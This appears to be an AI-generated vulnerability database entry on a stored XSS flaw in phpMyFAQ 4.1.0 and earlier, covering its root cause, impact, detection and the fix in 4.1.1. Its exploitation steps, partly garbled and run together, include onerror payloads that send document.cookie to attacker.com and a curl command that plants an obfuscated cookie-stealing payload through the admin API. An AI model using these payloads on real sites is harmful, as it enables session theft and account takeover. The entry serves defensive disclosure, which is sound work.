
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-34729 is a stored Cross-Site Scripting (XSS) vulnerability in phpMyFAQ caused by a regex bypass in the Filter::removeAttributes() sanitization function. It affects all phpMyFAQ versions up to and including 4.1.0 (Composer package phpmyfaq/phpmyfaq). The vulnerability was published on March 31, 2026, and patched in version 4.1.1 released the same day. It carries a CVSS v3.1 base score of 6.1 (Moderate) per the GitHub Advisory, though Feedly's data notes an alternative score of 4.8 (Github Advisory, phpMyFAQ Advisory).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation). The three-step sanitization pipeline in FaqController::create() first encodes special characters to HTML entities via FILTER_SANITIZE_SPECIAL_CHARS, then decodes them back with html_entity_decode(), and finally calls Filter::removeAttributes() to strip dangerous HTML attributes. The flaw lies in the regex used at Filter.php line 174 — /[a-z]+=".+"/iU — which only matches attributes with double-quoted values, leaving single-quoted (e.g., onerror='alert(1)') and unquoted (e.g., onerror=alert(1)) event handler attributes completely undetected and unremoved. The sanitized (but still malicious) question field is then rendered directly in faq.twig line 36 using the |raw filter, bypassing any further escaping (Github Advisory, phpMyFAQ Advisory).
An authenticated administrator who plants a malicious FAQ payload causes stored XSS to execute in the browsers of all users — including unauthenticated visitors — who view the affected FAQ page. Potential consequences include session cookie theft (enabling account takeover), phishing via injected fake login forms, malware distribution through redirects to attacker-controlled sites, and self-replicating XSS worms that create additional malicious FAQs. Availability is not directly impacted, but confidentiality and integrity of user sessions and site content are both at high risk (phpMyFAQ Advisory).
A proof-of-concept exploit with step-by-step instructions, including a specific curl command targeting the /admin/api/faq/create endpoint, is publicly available in the GitHub Security Advisory (phpMyFAQ Advisory). Exploitation requires high privileges (admin authentication) to plant the payload, but the XSS subsequently executes for all public visitors without any further interaction beyond viewing the FAQ page. There is no evidence of in-the-wild exploitation at this time, and the CVE is not listed in the CISA KEV catalog. The EPSS score is approximately 0.03–0.05%, placing it in the 16th percentile for exploitation likelihood (Github Advisory).
PHPSESSID) through phishing, credential stuffing, or other means.pmf-csrf-token from the FAQ creation form or API response.removeAttributes() regex, e.g., <img src=x onerror=alert(document.cookie)> or <img src=x onerror='fetch("https://attacker.com/steal?c="+document.cookie)'>.question field:curl -X POST 'https://target.example.com/admin/api/faq/create' \
-H 'Content-Type: application/json' \
-H 'Cookie: PHPSESSID=admin_session' \
-d '{"data": {"pmf-csrf-token": "valid_csrf_token", "question": "<img src=x onerror=fetch(atob(\"aHR0cHM6Ly9hdHRhY2tlci5jb20vc3RlYWw/Yz0=")+document.cookie)>", "answer": "Test", "lang": "en", "categories[]": 1, "active": "yes"}}'https://target.example.com/content/{categoryId}/{faqId}/{lang}/{slug}.html./admin/api/faq/create containing HTML event handler attributes (onerror, onload, onclick) in the question field./admin/api/faq/create with JSON bodies containing unquoted or single-quoted HTML attributes; access logs showing high traffic to specific FAQ content URLs (/content/{categoryId}/{faqId}/{lang}/{slug}.html) shortly after FAQ creation.question field contains raw HTML tags with event handler attributes (e.g., <img, <svg, onerror=, onload=) not enclosed in double quotes.{{ question | raw }} with unsanitized HTML content (phpMyFAQ Advisory).Upgrade phpMyFAQ to version 4.1.1 or later, which patches the regex in Filter::removeAttributes() to also match single-quoted and unquoted HTML attributes (phpMyFAQ Release). As a temporary workaround, restrict FAQ management access strictly to trusted administrators, implement a Content Security Policy (CSP) header that blocks inline script execution, and audit existing FAQ content for suspicious event handler attributes. Consider replacing the custom regex-based sanitizer with a robust HTML sanitization library (e.g., HTML Purifier) that correctly handles all attribute quoting styles (phpMyFAQ Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."